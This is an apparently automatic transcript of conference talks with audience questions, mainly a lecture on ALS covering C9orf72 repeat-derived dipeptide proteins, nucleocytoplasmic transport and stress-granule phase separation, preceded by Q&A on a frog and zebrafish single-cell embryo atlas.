Well, as far as the differentiation of various lymphocytes, subtypes and such. Well, we're not that far in development at all to even begin to see those things. There's classical Xenoposatlas, which we did compare to and as I mentioned, it matches beautifully, surprises mostly in terms of how early things begin to be defined. I guess I don't know what stage 22 means. Oh, there was a little picture there. It's a little fish which... How are we seeing your hematobiology? It's sort of like a little fish-looking sausage, which has not even gotten its first heartbeat. So how early can you see no one differentiation, brain differentiation? You ask about brain differentiation? Yeah. How early... When do you start to see it? Depends on your definition of brain. You have a lot of types of neurons where we recognize familiar markers. But all of this is RNA. And so if you want to know about the functional thing, I cannot say anything yet, but we do see at the latest stage types of neurons. So if you go to the poster, I'll zoom in with you and look at different neural types. You said between the two, you have around 5% of transcriptome measured in the two species. How much disease... No, I'm saying every single cell shows me about 1 to 5% of RNA molecules in the cell. The rest is lost. But as soon as I've taken several cells of a certain kind and averaged, I have a very good representation. Okay. And comparing the two species, how much this transcriptome is shared at different stages? I mean, first of all, something I really don't like to admit is that zebrafish has much smaller cells, but seem to show us high percentage for every cell. You are asking how similar is the expression across tissues? To my taste, we can discuss a million metrics of this comparison, but to my taste, it's a surprisingly not conserved. You recognize what you recognize, markers for cells for neurons and muscle, but those are the ones we have been studying for 20 years because they show up everywhere and very easily. But if you dig a little deeper, there's, to my taste, again, very little conservation. What is the minimum number of cells that you need for this analysis? Tough question, I don't know. Thousands? That's it? Well, we did the first round of analysis with 50,000 across 10 stages. We've seen much more when we added another 80,000. So I don't know how to think about the minimum. No, because this could change the data, depending how many cells you have, because when you have a small number of cells, you lose some of the cells with certain signatures. Absolutely. Right. So, that's retrospectively, after we have done 10 million cells, we will know how things change. Okay, you were supposed to go further and all questions could be asked during the panel discussion. So maybe... Actually, yeah, the short talks are meant to just draw people to the posters. And we can continue... Yes, of course, continue discussion during the final session or post-processional other way, and we will move to the next speaker.
|
The dynamics of gene expression in vertebrate embryogenesis at single cell resolution Time series of single cell transcriptome measurements can help us reconstruct the dynamics of cell differentiation in both embryonic and adult tissues. We produced such a time series of single cell transcriptomes from whole frog embryos, spanning zygotic genome activation through early organogenesis. From the data we derive a detailed catalog of cell states in vertebrate development, and show that these states can be assembled into temporal maps tracking cells as they differentiate over time. The inferred developmental transitions recapitulate known lineage relationships, and associate new regulators and marker genes with each lineage. We find that many embryonic cell states appear far earlier than previously appreciated, and assess conflicting models of vertebrate neural crest development. By further incorporating a matched time series of zebrafish from a companion paper, we perform global analyses across lineages, time, and species, revealing similarities and differences in developmental gene expression programs between frog and fish.
|
10.5446/50893 (DOI)
|
Thank you very much for the introduction. And also thank you very much for inviting me. It's a pleasure to be here. I think it's the first time that I'm in a meeting where I don't know anyone. I didn't know anyone. Yeah, I didn't know. But I'm learning to know people more and more. So for those that still stay till the end, I quickly want to say where L'Hœuvre is. So L'Hœuvre is a university town close to the capital of Belgium, to Brussels. Brussels has not really a big university. So the biggest university of Belgium is in L'Hœuvre. I'm not from Ghent, like is indicated on my name tag. Ghent is somewhere here. So it's closer to the seaside. And so now we are sitting somewhere here. This is France. So you should know L'Hœuvre, or at least that's what I hope you should learn to know L'Hœuvre from the historical things. There's a lot to see in L'Hœuvre. So whenever you're in Belgium, just give me a call or an email. So I will guide you around. It's a very old university. It's one of the oldest university on the continent. And if you don't know L'Hœuvre from the research or from the students, you should know L'Hœuvre from the beer. Stella Artois is from L'Hœuvre. And the combination beer and students is apparently a perfect combination. OK, so that's the introduction. What I want to show you today is what aging is doing to our population. So especially the Western population is becoming older and older. It's also increasing. The number of people is increasing. And what you see here in the red dashed line is the number or the percentage of people over 60 that we will have over time. And you see that more than 20% of the population in 2050 will be over 60. So older people also means that there is much more neurodegeneration. And neurodegeneration will come with a cost. And so what is shown here is a simulation of what it will cost to the society if we all become older and if we all start to suffer from neurodegenerative disorders. There is no cure for any of these disorders. And one of the reasons that there is no cure is because of an insufficient understanding of the pathogenic mechanism of the etiology and the pathogenesis of these diseases. And that's why I think we need to do a lot of research on these diseases. This is a slide showing what happens in a number of these neurodegenerative disorders. They are different in the sense that they affect different regions of the brain. They're also different in the aggregates that are formed in these different regions. And today I would like to focus on one of these neurodegenerative disorders. It's called ALS, Amiotrophic Lateral Sclerosis. And that's the disease that we are studying in the lab. What is ALS? ALS is a motor neuron disease. It affects selectively motor neurons and we have two types of motor neurons. We have the motor neurons that are in the motor cortex, the higher motor neurons. And these higher motor neurons, they connect with the lower motor neurons. And the lower motor neurons are in the brainstem and in the ventral horn of the spinal cord. These lower motor neurons, they connect the ones that are in the brainstem. They connect to the facial muscles and the muscles that you need for swallowing. And the lower motor neurons, they go to your arms and to your feet. So legs and feet. And so, yeah, that are the ones you need for voluntary movements. But also the ones that you have here, you need them to talk. So what happens if these motor neurons start to degenerate? You cannot move around anymore and you cannot talk anymore. So which means you're in some kind of a locked in state. So you cannot communicate anymore with your environment. The consequences of this dramatic disease, well, it's a very dramatic disease because you die from the disease usually two to five years after the detection of the first symptoms. It's a rare disease. Having said that, at this moment, there are four to five million people running around on the world that will die from ALS. So it's, yeah, it's lethal. So the incidence, just to give you another number, the incidence is the same as the incidence of multiple sclerosis, which is a disease that is much better known. There are also many more MS patients running around, but that's because they don't die from the disease. So it's an incidence between two to four per 100,000 per year. So what are the first symptoms? First symptoms are benign. So spasticity and hyperreflexia, atrophy of skeletal muscles, and then, as I already said, loss of speech, and also people get paralyzed. And there is no cure. So it's a dramatic disease without a cure. What is also important to know is that in 10% of cases, it is an inherited disease. So in 10% of cases, there are more family members that have suffered from the same disease, which means in 90% of diseases, we have no clue what the cause is. So that's an open question. So in these 10% of familial patients, we know in almost 80% of cases what the underlying genetic cause is. And I've here indicated the most important ones. I will come back to these genetic causes in a minute. What I also would like to point out is that what the pathology of these diseases, I told you in the beginning that every disease has typical aggregates, every neurodegenerative disease has typical aggregates. In the case of ALS, 95% of patients have mislocalized TDP43, which aggregates. So it's mislocalized in the cytoplasm. Usually, normally, TDP43 is a nuclear protein. But in the disease cases, TDP43 is mislocalized in the cytoplasm. And in the other cases, it's SOD1 or FUS. OK, so what is our goal is to understand the initial steps of the disease. And the major question we would like to answer is, how do these mutations that we know, how do they result in the pathology? And one of the things that I've just indicated is that mislocalization of that protein called TDP43. We hope, sorry? Yeah, it's an RNA-binding protein. So it has a role in RNA transport, in DNA damage, rescue against DNA damage. So it's quite well known what it's doing. It's less well known. Well, it's unstructured. Yes, so it has low complexity domains. And I will come back to that later during my talk, because that's important. So we hope that by studying the underlying mechanism that we can find also therapeutic targets. What I also would like to indicate that is that there is a lot of variability in a family, for instance, with the same mutation. The example I've taken now is mutation in another gene, superoxide dismutase 1. It's the enzyme that we all need to get rid of our free radicals to down-regulate oxidative stress. That's a genetic cause that is already known for a long time, more than 20 years. And so we have in Belgium patients with the mutation in SOD1. And you can see that the disease duration varies from two years to 20 years. So patients belonging to the same family have a difference in disease duration that is so significant and so dramatic. And there again, what we want to know is why is that? So which factors, which modifiers are responsible for that major difference? And again, if we know these modifiers, we can also try to develop therapeutic targets against these modifiers. By the way, there are exceptions on the rule that patients die after two to four years. And you all know one person, Stephen Hawking, has ALS. But he has a typical form of ALS. He has already disease for 30 years. So he's stabilized in a far advanced stage. Nobody knows why. But nobody knows the mutation. No, no. He has a sporadic form. But that doesn't matter. So there are also in the sporadic forms, there is also a lot of variation. The sequence was done. Yeah, yeah, yeah. Well, he has not a genetic cause of ALS, like in 90% of cases. Stephen Hawking also illustrates another aspect of the disease. Cognitively, these patients are still OK. So only the motor system fails. Only the motor neurons die. Sorry. So that's just to illustrate that there is a lot of variation in the disease. I want to come back to one of the genetic causes of ALS. And it's a very special one. We have already heard about repeats in genes when there was a talk about fragile X. There is also a gene causing ALS that also contains repeats in a non-coding sequence. There's also a non-coding sequence. It's C9 or 72. Why is it called C9 or 72? It's located on chromosome 9. It's an open reading frame. It's called number 72. So nobody really knows what the gene product of this open reading frame, what it actually is. The repeat is a hexa nucleotide repeat. Four Gs, two Cs. So GGGCC. Normally, well, I hope that we all have two to eight, maximum eight of these repeats. In patients, you have hundreds and several thousands of these repeats. And it's located, like I said, it's located in a non-coding region. If you develop disease, it's a mutation happens. Yeah. When you have such a large expansion of that hexa nucleotide repeat, you will get a disease. The only thing you don't know is when. But already, before we started, they haven't been checked before they had developed disease. Yeah, yeah, yeah, yeah. You can do that now because now we know what the cause of the disease is. Now indeed, we have pre-symptomatic carriers. We have families where we know that there are patients that have the repeat and that will get sooner or later the disease. It's important because now we can even look much earlier what is going wrong in these patients. Well, we should not call them patients. At that moment, they are not yet sick. So the big discussion in the field now, and well, I think most of people working in ALS are shifting to the hexa nucleotide repeats in C9 or 72, is how do these hexa nucleotide repeats, how do they cause ALS? And there are different possibilities. I will come back to that in a minute, but there is another thing I have to tell you. And that is that these repeats are translated. They are translated in a non-ATG mediated fashion. So there is no ATG in this repeat, in this intro. But despite that, they are translated. And not only the sense RNAs formed, also the antisense RNAs formed. And so because it's a hexa nucleotide repeat, and because there is no ATG, they can be translated in every reading frame. So theoretically, that means that there are six potential depeptide repeat proteins. But because there is one in the sense, the GP is translated both from the sense and from the antisense trend. So we have five different depeptide repeat proteins that can be translated from this repeat in a non-ATG mediated fashion. Do you know which is the polymerase? No, not much known about that. So now, well, they are now investigating how it actually works. Well, in the beginning, there was even a discussion, does this happen in the nucleus or in the cytoplasm? Well, it's a lot of investigation. Yeah, yeah, yeah, yeah, indeed. And so is it cap dependent or cap independent? They know mechanisms now. They know what they, you know, it's still not published. Oh, OK, yeah, well. They don't know. Yeah, yeah, yeah, but I mean, that's not what we are doing, actually. But indeed, it is important to know how this works because it's also happening in other repeat diseases. Also in Huntington, there is also, there are also repeats and they are also translated and the translation seems to be upregulated under stress. So cells under stress, they increase this non-ATG mediated RAN translation, is it called? OK, large amounts, I mean. Well, that's a, that, well, nobody. And you can detect it in the CSF and in the blood. You can also find them back in pathological material. It's not really known how much of these proteins you have. The concentrations, well, vary. It's also, there's also not a very good correlation between the place, for instance, where they find these aggregates and where you have the motor neuron that. So there is some kind of a discrepancy there. So there is still, there are still a lot of open questions, but yeah, these repeats were only discovered six years ago, five, six years ago. So it's relatively recent. So. What's the tissue specificity of these? It's present in every tissue. Well, you mean the DPR production? Yeah. It's mainly in neuronal cells that you can find them, but also in astrocytes. So it's, but not in, as far as I know, not outside of the CNS. But there are a lot of things that basically are appearing. Yes. At the onset or astrocytes in the ALS, right? That's happening late in. This happened. Well, that's, that's of course a problem. You can only, well, you can see it in the CSF and in the blood already at disease onset. And that's why these people that have the repeat, but that are not yet sick, why they are so interesting. But the fact is that most of them are still not sick. I mean, but in like, let's say five, 10, 15 years, some of them will develop a disease. And well, we are following them now already. So we will see when, for instance, these DPRs show up, which was previously only possible in patients when they were already sick, or when you have to look, well, postmortem material. Yeah. That will always be the same. It's at the end of life. So that's, that doesn't make much of a difference. But in, for biomarker research, you can now go much earlier to detect what shows up. Okay. So we focused on the DPRs. That's why I introduced them so extensively. And before I go on and focusing on these DPRs, I would like to give a little bit of a broader picture in the sense that it's still not yet known whether it is due to loss of function or due to gain of function that these repeats cause ALS. Although there are a lot of arguments that it's not just loss of function. I'm not saying that loss of function couldn't play a role, but it doesn't seem to play a major role. So the expression of C9 or 72, for instance, seems to be quite similar in patients and in controls. And then there are two gain of function mechanisms proposed. There are RNA foci seen in the nucleus, and these RNA foci, they contain these repeats, these hexanucleotide repeats, and they also bind RNA binding proteins. And so maybe by doing that, they deplete the nucleus from some essential RNA binding proteins. So that could be a gain of function. And then the other gain of function is what I just described is that RAND translation, the production of these DPRs that you usually don't have, and that can become toxic. What have we done when these repeats were discovered and when DPR translation was suggested as being important? We have made constructs where we have introduced an ATG in front of a sequence, and we used the wobble positions to create a coding sequence that doesn't contain the repeats. And these constructs also, they only express one of the DPRs, because that's a problem when you just express, for instance, these repeat RNAs in cells. You don't know what actually is translated from them, so you will have a mixture of all of them. So what we have now is constructs with just one of the DPRs expressed. And these constructs don't form RNA aggregates, for instance. So we used these constructs to find out which mechanisms are responsible for DPR-induced motor neuron that, and the story I would like to share with you, the first story I would like to share with you, is the role of nucleosytoplasmic transport that we discovered a few years ago. This was done both in yeast and in flies. And so in yeast you have an inducible system, so you can turn on the expression of the different DPRs. And so then you have a dilution test, so you dilute and you see how many of the yeast colonies survive. When you turn on the expression of the arginine containing the GR and the PR, then you can see, well, for instance, for the PR here, that there are no yeast cells growing. And also for GR you can see that the number of yeast that is growing, the number of colonies, is lower. While the other two that are tested here don't have any effect on survival. We did similar things in the fly eye, and so here is a control eye. It looks like a control eye, but in fact it expresses one of the DPRs, PA, and it doesn't show any defect. While when we express, again, an arginine containing DPR, you can see that the eye looks a bit sick. It's not only the eye that is affected when we just express, because in that case we only express the DPRs in the fly eye. We can also express the DPRs in the motor neurons or in the whole body. And what you see then is that the ones that, again, express the arginine containing DPRs that they have a shorter survival, whether these are females or males, it doesn't make a difference. And now that we have this system where we have clearly cell debt that is induced by certain types of DPRs, we can use that system to look for modifiers. Why is the arginine contained? Why is the arginine contained? That's a good question. If you replace it with lysine, will it do the same thing? No, the arginine is important. But again, I will try to give an answer. I'm not saying I know the answer, but we have some hints what could be... Before question, this is a piece that for all patients are only having this in the family. It's only for the ones that have the hexanucleotide repeats in C9 or C72. All patients have this. If you have the repeat, you have the DPR. If you have this disease, do you have necessarily repeat? No. No, no, no, no, no. Because... Yeah, yeah, yeah, yeah, yeah. So again, so only 10% is familial. And from the 10% of this familial, 60% have the repeats that I just occurred. The rest have no repeats, they may have developed diseases without repeats. The rest have other mutations in other genes, or mutations in genes that we don't know, but the majority, and that's important to know. The mutations of the same protein. Sorry? It means folding of the same protein. Well in the end, it's always Tdb43 that is found, and that is independent of whether it's genetic or sporadic. That's very important to mention indeed. So the pathogenic end result is always the same, independent of whether you have the repeat or whether you have no genetic cause or whatsoever. So that's indeed an interesting observation. And to be honest, we don't really know why that is. And I will come back to that also in the end. So now we have two models, yeast and fly, and we can use these models to screen from modifiers. So for instance, for the fly, we just have SIRNA expressing flies. For the yeast, you have deficiency strains, and you just mate them, you just cross them. And then you can see whether this improves the condition of the yeast, or whether it improves the eye of the fly, whether it has no effect at all, or whether it makes it worse. So that's a classical modifier screen that you can do in these organisms. And they have the advantage that all these lines are available. So it's relatively easy to do these screens. And so this is just an illustration of what it means to be better or worse. So this is the control condition where we just expressed the arginine containing DPR. Here is a modifier that makes it worse. Here is a modifier that makes it better. The same for the fly eye. This is what we normally see with some pigmented places in the eye. Here the pigmentation is much more pronounced. So this modifier makes it worse. Here you can see that it almost looks like the healthy eye. So this is a modifier that makes it better. Okay, so which modifiers did we find? And that's illustrated here. The modifiers that had the biggest effect had to do with or the nuclear pore, or the nucleosytoplasmic transport. And so these are a number of enhancers that all have to do with nucleosytoplasmic transport. Here are a number of suppressors that have to do also with nucleosytoplasmic transport. And also in the yeast screen, these modifiers were over-represented. So the genes that have a role in nucleosytoplasmic transport were over-represented in the modifiers, both in the enhancers and in the suppressors, which makes it more complex, of course. And so if I summarize a lot of work in one slide, so this is a representation of all the enhancers and all the suppressors that we have found, both in flies and yeast. So and in red, it's the enhancers, and it are mainly the constituents of the nucleosytoplasmic transport mechanism that are in the cytoplasm, while the suppressors are mainly localized in the nuclear pore. But don't ask me how they influence toxicity. That's something we are investigating now. It plays a role. The only thing we don't know is which role. I mean, that's more complicated to find out than we expect. So the protein in the infotain of the m-tore, which m-tore is this? That I don't know by heart. It's like R1GTP. What is it? Yeah. But there is another m-tore. I don't know. Yeah, here. Yeah. I don't know. I should check which one it is. So I don't know all the, I'm still learning how. The same name too many times. And these are, to make it even more complicated, these are the names of the fly genes. So I'm not sure whether it's the same m-tore. No, I don't think so. So these are the fly names. So I can check what it is in. Basically, you're getting anything that is affecting the nucleopore. Yeah. And it's doing it in both directions. It would be nice if it was always preventing toxicity, but that's not the case. And that's, we are not the only one, by the way, that found this. So other groups have similar problems, so to say. But it's always clear, because there are two other groups that came up with similar data, it's always clear that it has to do with nucleosytoplasmic transport. So that's the interesting thing, let's say. So did you look to see if there is any direction here, directionality here? That's something we are investigating now. So we are now... Because the enhancer versus suppressor could be explained by, who helps to go to one way. Yeah, well, the first thing we thought was maybe the DPRs are just binding to the nucleopore. It doesn't seem to be that simple. I mean, that's not... no. That's, I mean, that had been too easy, I suppose. So could it be that this particular... It's actually the RNA that is... No, in this case, in... Yeah, okay, yeah, yeah. No, no, no, it's bound to a particular problem that's moving around. I mean, because it's so rich in the... All options are open. So yeah, it's... Because of course, yeah, there is RNA, both as proteins that have to pass... No, it's... Yeah, not have to pass the pore. Yeah, yeah, yeah. So it's... No, but it is translated. So it means that the RNA is not... No, no, no, no, you have no idea at this point whether the effect was in the RNA or is the effect in the probe. I know, but it's the chance... It's the possibility that the RNA is stuck in the pore. So how is it... It's not translated. Yeah, but it's... No, no, but it could be other RNA. It could be other RNA that it doesn't need to be the repeat RNA. That's what you, I think, are referring to, wasn't there a question? Okay. My point was the very one where the hexanucleotide repeat was recoded, so the repeat is not... No, no, no, in this case, the repeat is not there. So in the models that we have, there is clearly no effect of repeat RNA. But of course, in the patients, yeah, we don't know. And of course, it could also just be other RNAs. That's the point I just wanted to make. Okay, so that's nucleosytoplasmic transport. We made some nice movies these days. Well, what we think is happening, and so you have to think about the orange dots as being TDP 43. When something is going wrong with nucleosytoplasmic transport, it could very well be that they mislocalize in the cytoplasm, so that in one way or another. But again, this is an oversimplified model because we have no clue how it exactly works. If I then just go to what happens with TDP, so normally TDP is localized in the nucleus. What we see happening over time is that TDP 43 gets mislocalized, not only in the patients that have the hexanucleotide repeat. So this happens in all the patients. So if you would express this in a mammalian cell, do you get also this mislocalization through cell division in other words? I'm trying to figure out whether we see. We don't see mislocalization of TDP 43 in simplified cell system. So we also have, and I will come back to that later. We have for instance now IPSC lines that we can differentiate into all kinds of cells. We don't see in these cell systems, we don't see the same mislocalization of what you see in the patients. But of course these patients, when they become sick, they're 50, 60, 70 years old. In the flies we also don't see mislocalization. So how do you explain that? How do you connect? Yeah, well, we don't know. That's the honest answer. That's why FUS is also mislocal. Yeah, FUS is also mislocal. I could more or less tell the same story with FUS instead of TDP 43, but FUS is much more rare. That's only in 2-3% of patients. In which cell did you do the mislocalization? The mislocalization is in the patients. So the mislocalization is in post mortem material. But of course you start from what you see in patients, so it's mislocalized. So the question is, what's the explanation for that? The explanation of that could be that there is a problem with nucleoside or plasmid transport. That's the point I just want to make with these movies. The patient you're integrating after many years, this is not the same as in your culture. Of course not. I mean, that's exactly the point I want to make. So it might not be anything to do with trying, right? No, but it could be. There is, well, and it modifies, it can modify the nucleoside or plasmid transport, these DPR. Modify the same. So it's any yeast. No, no, no. You can generate cell line from the patient. Yeah, yeah, yeah. All the nuclear poor proteins that were used and ZF2 were used. That's indeed what people are now doing, that is whole genome CRISPR-Cas9 screens on IPSC lines or on motor neurons that are differentiated from. And there is, well, there was, I think, yesterday or the day before yesterday, there was a paper in Nature Genetics where they have done a DPR screen. It's a group from Stanford where they have done a DPR screen on cell lines. And they found again that the nucleoside or plasmid transport was over-represented in the hits they had. Together, I must be honest, together with, for instance, ER stress was also there. DNA damage-related proteins were there. So it was not only nucleoside or plasmid transport. And, of course, the next question is what in a neuronal system, because this was not yet in a neuronal system. Any idea what's special in what are neurons? So what particular? They have very long axons. And yeah, that's, and they are also, they have also another way of signaling. So in the glutamatergic signaling, they don't use NMDA receptors. They are more dependent on AMPA receptors. And there are, well, less calcium binding proteins. I mean, there is a lot of things that are different in motor neurons in comparison to other neurons. Whether that's all related to the disease, that's, of course, another question. Is it not that these aggregates are actually the cause of the synpneurological symptoms? No. No. No. And that's, of course, that's also an argument I sometimes use when I have to answer the question. How do you explain the fact that aggregates don't correlate, aggregates of the DPRs don't correlate with the cells that die in the disease? Maybe it's just a way of the cell to get rid of something that is very dangerous. It's possible. Yeah. Could it be that due to the long axon, that the protein needs to travel a long time in order to get to the nucleus? Yeah, because. Translate it. Yeah, because, yeah, to get translated. No, they are getting translated. Yes, yes. But then they have to travel a long time. Yes, and that's indeed a good point because one of the roles of TDP43 is to bring RNA to the neuromuscular junction. So in that sense, but then, of course, then it has to go back and to go back to the nucleus to get the next RNA. So that axonal transport is important. Well, that seems to be, and I will come back to that if I still have time. So, the mechanism of this particular transport, how it being actually got a mechanism? The mechanism of what? Who is this transport? What are proteins which move it? The normal, the normal, yeah, yeah, the normal motor proteins, dinectin kinaseins, the normal, the normal, and I will come back to that in the end of my talk, hopefully. The DNA damage proteins you spoke about, are they known? Yeah, yeah, yeah, they are known. Not by me. Have they something to do with sleep or with repeat? No, I think as far as I remember, it's single strength DNA breaks and double strength. Well, I mean, but I can try to... Nothing to do with the repeats? No, no, no, no, no, no, no, no, no, no, no, no, no, it's just... Well, apparently... How do you generate the repeats? Sorry? How do you generate the repeats? In which case? With what you showed. Yeah, that's all overexpression. That's also something you have to keep in mind. Everything I showed until now is overexpression of a construct with a repeat. No, okay. I mean, what you showed in some cases, they are repeats, hexane, as you know. So is it known what is the... How... The mechanistic... How these... How these are... Yeah, no. The question now of some... the machinery of DNA... Yeah, yeah, yeah, replication. Yeah, yeah, no, that's not... It's not even known... It's not even known whether the length is the same in every tissue. So it could even be that, for instance, in neurons, you have much longer repeats than in other tissue. But it's not... It's easier to verify more with more techniques, yeah? That's what people are doing for the moment. Yeah, yeah, it's trying to figure out. And it's also not that the next generation always has longer repeats than the previous ones. But there is variation. There is clearly variation. But the last word has not been said. I mean, this is relatively recent, like I said. So it's work in progress. Okay, so, yeah, to end this part of nucleosytoplasmic transport, it seems to be a key partway, and that's confirmed now again with also the whole genome CRISPR-Cas9 screen that I just mentioned, and that is published, I think, the day before yesterday. And yeah, what we are investigating for the moment is what the exact mechanism is. So that's still an open question. But while we were doing these experiments, we purified the DPRs, and we had pure protein, pure DPR protein. And when we looked at it in a test tube, then we noticed that these test tubes could become opaque. For instance, when we cooled them down, when we just put them on ice, then we could see that something like this happened. So normally, this solution is transparent. If you cool it down or if you add a molecular crouter, it gets opaque. And so what you then see under the microscope is that droplets are formed. So that was not known until we observed that just by accident. What is this guy's droplets? So these are droplets of the arginine-containing DPRs. So when we just have arginine-containing DPRs in the right conditions, then we can just see that they form these kinds of droplets, that they face separate. That's actually what happens. And so that's actually the same as what happens with oil and vinegar. So you have face separation, so there is no membrane around it. So these proteins seem to cluster together. And what is now a very popular view in the field, and that brings me back to the formation of the aggregates, is that you have these physiological granules, which are these droplets that are not only formed by DPRs, but also, for instance, TDP43, which is also a protein with low complexity, with low complexity domains, but also FUS, for instance, that they form these physiological aggregates, sometimes in combination with RNA, but I will come back to that in a minute. And that then over years, this can result in pathological aggregates, because this process is reversible. So going from soluble to physiological granules is a reversible process. Similar with here, if we just, yeah, well, warm this solution, then these droplets disappear, and we can do that 100 times. There are no aggregates formed in our test tube, but maybe in the cell under certain conditions, you can have the formation of these physiological granules, these droplets, and then over time they can form pathological aggregates. Yeah, I already told you, but it's a characteristic only, again, of the arginine-containing DPRs. So when there is no arginine in the DPR, you don't see it. Yeah, here is what you see under. They're not the only arginine-containing, even the APS, what, or arginine-containing. So they... It's common for all DPRs. No, it's only for the arginine-containing DPRs. So you need to have... it's PR or GR. And you also need to have the right buffer conditions, because the problem, of course, is you have a lot of positive charges, so you need to have counter ions. So in the case, well, you have to have the right buffer, so it works best with a phosphate buffer. So that's what you see here. For instance, in potassium chloride, you don't see them, and that's why also a lot of people missed this formation of these droplets. And what is also important to indicate is that RNA can also be a counter ion, so the negative charges of RNA. And so when you, for instance, what you see here is increasing concentrations of RNA added to a solution of the arginine-containing DPRs. So the higher the concentration of RNA, the more turbidity we see, the more droplet formation we see. Okay, we can also do FRAP, so we can bleach fluorescence recovery after bleaching. So we bleach, and then you can see that the fluorescence, if we label the arginine-containing DPRs fluorescently, you can see that the fluorescence come back. So it's a dynamic process. And here you can see it over time. Well, we have young and old droplets. It doesn't make much of a difference. So it's not that we have aggregate formation in our test tubes because these are test tube experiments. So then what we did was we did masspec on the proteins that associated with these arginine-containing DPRs. So a little bit to our surprise, when we centrifuge a solution with arginine-containing DPRs, we found that there were a lot of proteins bound to these DPRs. And then if we did masspec, the most prominent pathway that popped up was where the stress granules. And stress granules are also structures that are formed by phase separation. So there are also no membranes around the stress granules. And so then we started to look at stress granules. So this is a cell line where the GDPB1 is labeled, is progressively labeled. And then if you put these cells under stress, then you can see that droplets are formed in the cell. And you can even see if you focus here in this region of the cell, you can see that they also start to form bigger droplets that they fuse. A little bit the same as the droplets that I've just shown you in the test tube. But the difference is that these are stress granules in the cell. We also RNA is included in these stress granules while what I've shown before. Don't form the liquid droplets. You cannot see the opaque. No, no, no, no, no. This is a cell. I mean, you have to label them with... Even when you take them out. Which what taking the stress granule? Yeah, if you... The stress granule has nothing to do with oil like... Yeah, well, it's a similar process. The formation of a stress granule is the same thing as what you see when the olive oil is separating from the vinegar. So that's... It's a similar process, of course. I mean, here is also RNA involved, which is not the case when you are looking at your cell dressing. You can have a translation. Yes, yeah, yeah, yeah. And I think at G3BB, one is indeed a protein that binds to RNA to prevent it from being translated because indeed these stress granules... What are these stress granules? Yeah, stress granules is a way of the cell to keep RNA shielded and untranslated for a while while the cell is taking care of surviving. So it's upregulated proteins that keep it alive. And the other RNA that at that moment is less important is just stalled away in the stress granules. And they surround the proteins? No, this is a combination of proteins and RNA. So this is what you see here is a blob of proteins and RNA combined. And it's a very small cell. So this is very small. It's very small granules. But you can see them with fluorescent microscope. Yeah, yeah, this is fluorescent microscope. So about 100 meters or something. Yeah, something like that. I mean, large. Well, they can... You can have them in different sizes, but they are subcellular. So... What is this response to? What is stress? Yeah, stress can be everything. So in this case, it's... well, what you see here is arsenide. That's a very popular way of putting cells under stress, but it can also be oxidative stress. It can also be heat. I mean, whatever you can do to a cell that puts them under stress will lead to the formation of these stress granules. And once the stress is gone, these stress granules disassemble. So then the cell just... well, starts to use, starts to use the RNA again. I mean, then that's at least... well, what should happen? It's probably to preserve ATP in part because mRNA translation is the major consumer of Facebook. As well. Yeah, yeah, yeah. So, but in a way, it's just to protect the cell from stress. It's a stress response. And the point I want to make is that... yeah, you can do it by arsenide, so by addition of arsenide, but you can also do it... you can induce these stress granules also by adding the arginine-containing DPRs. So that's also apparently a stress. It also induces stress granules. And what is also indicated here is that in case... in the case that you induce the stress by these DPRs, you have more TDP43 in the stress granule if you compare it to stress granules that are induced by arsenide. So that's my second conclusion. So the arginine-containing residues, they are... well, the arginine-containing DPRs, they undergo liquid-liquid phase separations. These arginine-containing DPRs can also induce the stress granules. And it seems to be, but that's a more general conclusion, that numerous pathways, not only nucleosytoplastic transport, but also stress granule formation are influenced by these arginine-containing DPRs. And the patients, are those actually liquid droplets or these are? Yeah, well, you should... well, yeah, these are aggregates. Those are aggregates. Yeah, yeah, yeah, yeah. Yeah, the whole thing is, what we believe is that what we are looking now at in culture is something that happens years before the formation of the aggregates. And that's actually what is also illustrated in this summarizing figure. And this process, so the phase separation and the formation of stress granules, but there are a lot of other structures in the cell that are formed in a similar way, that that is a reversible process. And that then over years, this can become irreversible, that gels can be formed, and that after certain years, also these gels can form macroscopic aggregates. That's the idea. I mean, not so easy to prove that the same happens in patients because, well, what you see is the entries out. You should, well, be able to go back years before the patient dies, which is a bit difficult. And the aggregates in the patients, are they intracellular? Intracellular. Intracellular. Yeah, yeah, they're all intracellular. So cytoplasmic. Yeah. I'm just confused with the liquid-liquid. The aggregates are liquid? No. The aggregates are not liquid. So the aggregates is, but that's the, so what you have, first you have soluble protein. Then you have the liquid-liquid phase separation, which gives you these droplets or these stress granules. Then that can lead to gels. That's the next step, where there is maybe a core that is a bit more stable. And that can then over time generate these aggregates. So it's a stepwise process. And the first steps of the process are reversible. The last step, once you have an aggregate, it's not reversible anymore. But when you do the experiment in mice, you use ALS in the models. You see right away, you don't see the liquid. Yeah, no, you don't see. No, no, no. Well, so in human, if we look at the mice. Yeah, but there is not a good mouse model for, for seeing. Yeah, there is one, there's a good one for ALS, but that's based on salt one, on SOD one, of which people think that that's the. SOD 90 is. There is, there is one, there is one good model, but it's not, it's not available to the community yet. So once that becomes available, we can test that. They say they saw aggregates right away. In the patients. No, in the mouse. In the mouse. The C9 of. There are, yeah, there is one model where they indeed see aggregates, but it's, yeah, but. Before seeing the liquid. That's what you should check in this, in this mouse model, but that has, as far as I know, not yet been done. Yeah, that's indeed interesting. Yeah. Can you tell me about the gel stuff? Yeah. The stage. I hope. What do you know about it? Yeah, well, it's just, I mean, a less. How do you distinguish it from the stress planning? Yeah, well, in, in, in, in, in, in just in test tube, you can, you can see that it jelly fies, that it's, that it's more, yeah, in cells, it's not possible to, to see that difference. So you don't, so in cells you do, you see either. You see either the stress granule. Yeah, yeah, yeah. Yeah. The gel, the gel thing is, is more something that comes from a test tube, test tube experiment where they can indeed see. And some people, well, that's a big debate in that field. They say that there is a stable core in these gel-like structures, which then is even another argument for saying there is already. Yeah, it's an intermediate step to, yeah, to, to the formation of the aggregates. So that's, yeah, okay. And it never happens in other cases, only in modern humans, hopefully. Maybe also in astrocytes, but that we don't know yet. That should be checked. Yeah. So, yeah, so what is, what is part of these stress granules? No, no, no, no, no, no, no. Yeah, yeah, stress granules happen everywhere. Yeah, yeah. The formation of the aggregates, the transformation of these reversible structures to irreversible aggregates, that seems to be something unique for motor neurons. Maybe because most cells are reproducible. Yeah, yeah. The neurons are not so, they're very, they live for many years. Well, for your entire life. But muscle cells also don't differ usually. Muscle cells do differ, no? Muscle cells regenerate. Oh, yeah. Yeah, yeah, yeah, but motor neurons don't regenerate. So you're born with a number of motor neurons and in the best case, you die with the same number. And ALS patients, yeah, they die when they have lost a large proportion of them. So, that's, so they live, well, if you're lucky, 900 years, which is, makes them, well, all neurons do that. Neurons, that depends. Yes. When you take the very long neurons to the nerve septic, but you know where the neurons are, that's the big... Yeah, 